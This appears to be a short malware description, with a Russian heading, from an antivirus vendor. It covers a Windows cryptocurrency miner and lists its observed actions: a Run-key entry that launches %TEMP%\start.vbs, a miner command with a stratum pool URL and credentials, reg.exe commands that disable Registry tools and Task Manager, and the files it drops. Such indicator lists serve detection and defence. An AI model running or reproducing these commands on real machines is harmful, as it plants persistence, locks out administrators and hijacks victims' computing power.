Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'wservices.exe' = '%TEMP%\start.vbs'
- '%TEMP%\services.exe' --url=stratum+tcp://eu.ltcrabbit.com:3333 --userpass=mediaclickinc.7:12345
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run /v wservices.exe /t REG_SZ /d %TEMP%\start.vbs
- '<SYSTEM32>\wscript.exe' "%TEMP%\start.vbs"
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools, 1, "REG_DWORD"
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1, "REG_DWORD"
- %TEMP%\start.vbs
- %TEMP%\zlib1.dll
- %TEMP%\services.exe
- %TEMP%\libcurl-4.dll
- %TEMP%\pthreadGC2.dll
- 'eu.###rabbit.com':3333
- DNS ASK eu.###rabbit.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''